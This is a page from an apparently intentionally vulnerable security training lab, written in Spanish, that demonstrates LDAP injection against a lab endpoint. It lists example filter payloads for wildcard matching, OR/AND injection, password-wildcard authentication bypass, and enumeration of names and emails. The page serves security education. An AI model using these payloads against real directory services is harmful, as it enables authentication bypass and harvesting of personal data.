HIGH

LDAP Injection

Inyección en consultas LDAP para bypass de autenticación y acceso no autorizado

Intermedio

Modo Reto activo — explora libremente. Activa el Modo Tutorial si necesitas orientación.

Ejemplos de explotación:

Búsqueda normal

Consulta LDAP legítima por nombre de usuario

/api/lab/ldap?filter=admin
Wildcard — todos los usuarios

El comodín * devuelve todas las entradas del directorio

/api/lab/ldap?filter=*
LDAP Injection — OR lógico

Bypass de autenticación usando OR lógico LDAP

/api/lab/ldap?filter=*)(|(cn=*
Bypass con * en password

En login LDAP: usuario=admin, password=* (wildcard acepta cualquier valor)

/api/lab/ldap?filter=admin)(userPassword=*
Enumerar cn (common name)

Extraer todos los nombres comunes del directorio

/api/lab/ldap?filter=*)(cn=*
Enumerar mail

Extraer emails del directorio LDAP

/api/lab/ldap?filter=*)(mail=*
Inyección AND — condición verdadera

Combinar condiciones AND para acceso forzado

/api/lab/ldap?filter=admin)(&(objectClass=*
Cerre parentesis — cierre de filtro original

Inyectar cierre del paréntesis del filtro LDAP original

/api/lab/ldap?filter=admin))%00

Vulnerabilidad Alta

Este endpoint construye consultas LDAP concatenando entrada del usuario directamente. Un atacante puede manipular la consulta usando caracteres especiales como *, (, ), | para acceder a datos no autorizados o bypass de autenticación.

Esta aplicación es vulnerable por diseño - Solo para propósitos educativos

© 2025 Aitana Security Lab